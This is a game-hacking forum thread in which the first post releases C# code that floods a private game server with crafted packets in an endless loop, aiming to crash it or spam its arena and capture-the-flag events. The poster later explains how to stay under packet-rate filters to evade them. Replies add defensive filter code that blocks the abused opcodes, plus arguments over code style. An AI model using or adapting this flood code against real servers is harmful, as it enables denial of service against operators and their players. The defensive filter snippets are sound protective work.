[Release] GameServer flood/crash exploit

Page 1 of 2 1 2
06/15/2017 15:03 Drupanda#1
blabla, new exploit, :( blis fix menz

Send this after 0x3013 S->C (or char_spawn packet)
It's flood based, required to be flood to crash GameServer, working with Packet Injector or Client less core.
Code:
            flood:
            int num = 0;
            int packet_count = 50;
            int cur_count = 0;
            int delay = 1;

            for (cur_count = 0; cur_count <= packet_count; cur_count++)
            {
                switch (num)
                {
                    case 0:
                        {
                            Packet packet = new Packet(0x34B1);
                            packet.WriteUInt8(9);
                            Agent.Send(packet);
                            num = 1;
                            break;
                        }
                    case 1:
                        {
                            Packet packet2 = new Packet(0x34D2);
                            packet2.WriteUInt8(5);
                            packet2.WriteUInt8(0);
                            Agent.Send(packet2);
                            num = 2;
                            break;
                        }
                    case 2:
                        {
                            Packet packet3 = new Packet(0x34D2);
                            packet3.WriteUInt8(5);
                            packet3.WriteUInt8(1);
                            Agent.Send(packet3);
                            num = 3;
                            break;
                        }
                    case 3:
                        {
                            Packet packet4 = new Packet(0x34D2);
                            packet4.WriteUInt8(5);
                            packet4.WriteUInt8(2);
                            Agent.Send(packet4);
                            num = 4;
                            break;
                        }
                    case 4:
                        {
                            Packet packet5 = new Packet(0x34D2);
                            packet5.WriteUInt8(5);
                            packet5.WriteUInt8(3);
                            Agent.Send(packet5);
                            num = 0;
                            break;
                        }
                }
                cur_count++;
            }

            if (cur_count >= packet_count)
            {
                Thread.Sleep(delay);
                goto flood;
            }
What it does?

Fuck y'all. :awesome:
06/15/2017 15:45 Worshiper#2
Ty For Release it :)
06/15/2017 16:54 Wisdom'#3
Actually it won't work because most of the p-servers are using filter nowadays ..
06/15/2017 18:49 sarkoplata#4
this doesn't actually crash the modules afaik, just spamming ctf/ba messages in game and fucking ctf
06/15/2017 19:02 ramy_11_1#5
Fix:
[Only registered and activated users can see links. Click Here To Register...]
06/15/2017 20:48 ILowe#6
Quote:
Originally Posted by ramy_11_1 View Post
Fix:
[Only registered and activated users can see links. Click Here To Register...]
good work bro

code ? paste pleas
06/15/2017 21:48 elmagico321#7
Quote:
Originally Posted by ILowe View Post
good work bro

code ? paste pleas
here we go

Code:
 #region Closing ctf , arena and fortress exploit
if (packet.Opcode == 0x34B1 && !Main.absolute_bypass.Contains(this.username))
{
this.CleanClient();
continue;
}
if (packet.Opcode == 0x34D2 && !Main.absolute_bypass.Contains(this.username))
{
this.CleanClient();
continue;
}
if (packet.Opcode == 0x385F && !Main.absolute_bypass.Contains(this.username))
{
this.CleanClient();
continue;
}

#endregion
06/16/2017 10:18 utku1676#8
why it here ? " !Main.absolute_bypass.Contains(this.username) "

for GM ? or wht
06/16/2017 11:29 M4n1ak#9
Quote:
Originally Posted by ramy_11_1 View Post
Fix:
[Only registered and activated users can see links. Click Here To Register...]
WTF is that code.. so turkish way to code something.
This can be simplified (and faster) to:

PHP Code:
#region Closing ctf , arena and fortress exploit
bool someShitBoolean Main.absolute_bypass.Contains(this.username);

if (!someShitBoolean && (packet.Opcode == 0x34B1 || packet.Opcode == 0x34D2 || packet.Opcode == 0x385F)) {
    this.CleanClient();
    continue;
}

#endregion 
06/16/2017 22:29 Drupanda#10
Quote:
Originally Posted by Wisdom' View Post
Actually it won't work because most of the p-servers are using filter nowadays ..
Yes it will, just send under the allowed packet limit second.

Quote:
Originally Posted by sarkoplata View Post
this doesn't actually crash the modules afaik, just spamming ctf/ba messages in game and fucking ctf
Look message count in GameServer, it will continue growing.
06/17/2017 02:59 ramy_11_1#11
Quote:
Originally Posted by M4n1ak View Post
WTF is that code.. so turkish way to code something.
This can be simplified (and faster) to:

PHP Code:
#region Closing ctf , arena and fortress exploit
bool someShitBoolean Main.absolute_bypass.Contains(this.username);

if (!someShitBoolean && (packet.Opcode == 0x34B1 || packet.Opcode == 0x34D2 || packet.Opcode == 0x385F)) {
this.CleanClient();
continue;
}

#endregion 
i copy paste it from my old src.
i was disabled these opcodes about 2 years ago,
after 3DProgrammer released his arena bot tool.

did that code will be faster?
you should put the opcode checking case first to ignore checking username
into bypass list everytime with any opcode!
please edit yours too.

for who want fixing code (copy&paste)
here it is:

Code:
#region Closing ctf , arena and fortress exploit
if (packet.Opcode == 0x34B1 || packet.Opcode == 0x34D2 || packet.Opcode == 0x385F)
{
  	this.CleanClient(); // disconnect function as you call it in your src
  	continue;
}
#endregion
Quote:
Originally Posted by utku1676 View Post
why it here ? " !Main.absolute_bypass.Contains(this.username) "

for GM ? or wht
its admin bypass list, which added into a table or text file as you did.
if you don't have in your src something like this. just ignore it.
06/22/2017 07:46 hoangphan7#12
Useless :D! Guard will drop connect after floods
06/23/2017 12:29 Drupanda#13
Quote:
Originally Posted by hoangphan7 View Post
Useless :D! Guard will drop connect after floods
Only if you exceed the limit.
08/11/2017 21:21 anhhoansro1#14
Quote:
Originally Posted by M4n1ak View Post
WTF is that code.. so turkish way to code something.
This can be simplified (and faster) to:

PHP Code:
#region Closing ctf , arena and fortress exploit
bool someShitBoolean Main.absolute_bypass.Contains(this.username);

if (!someShitBoolean && (packet.Opcode == 0x34B1 || packet.Opcode == 0x34D2 || packet.Opcode == 0x385F)) {
    this.CleanClient();
    continue;
}

#endregion 
Where can I insert this code?
08/11/2017 22:51 sonzenbi#15
Quote:
Originally Posted by anhhoansro1 View Post
Where can I insert this code?
Filter
Page 1 of 2 1 2